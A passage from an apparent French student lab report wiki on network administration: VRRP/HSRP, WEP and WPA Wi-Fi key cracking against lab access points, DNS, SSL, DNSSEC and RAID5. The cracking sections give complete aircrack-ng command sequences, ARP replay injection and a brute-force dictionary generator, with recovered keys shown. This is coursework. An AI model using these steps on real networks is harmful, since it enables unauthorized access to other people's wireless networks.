10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 6e séance (additionnel) ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2enmod ssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:SSLSite.png]]&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 7e séance====&lt;br /&gt;
=====Création du RAID5=====&lt;br /&gt;
On ajoute premièrement les partitions à la définition de la machine virtuelle:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;'phy:/dev/virtual/RedFlash,xvdb,w',&lt;br /&gt;
'phy:/dev/virtual/BlackFlash,xvdc,w',&lt;br /&gt;
'phy:/dev/virtual/ReverseFlash,xvdd,w'&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on crée le RAID5 avec les 3 partitions :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mdadm --create /dev/md0 --level=5 --raid-devices 3 /dev/xvdb /dev/xvdc /dev/xvdd&amp;lt;/pre&amp;gt;&lt;br /&gt;
On vérifie en regardant le fichier de log /proc/mdstat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.0% (692512/1047552) finish=0.1min speed=30109K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===============&amp;gt;.....]  recovery = 78.5% (823084/1047552) finish=0.1min speed=29395K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [================&amp;gt;....]  recovery = 84.2% (883700/1047552) finish=0.0min speed=29456K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=================&amp;gt;...]  recovery = 87.4% (916664/1047552) finish=0.0min speed=29569K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 93.5% (980148/1047552) finish=0.0min speed=30182K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 96.6% (1012980/1047552) finish=0.0min speed=30267K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 98.1% (1029332/1047552) finish=0.0min speed=30794K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 99.5% (1043028/1047552) finish=0.0min speed=30260K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# [ 1462.872022] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
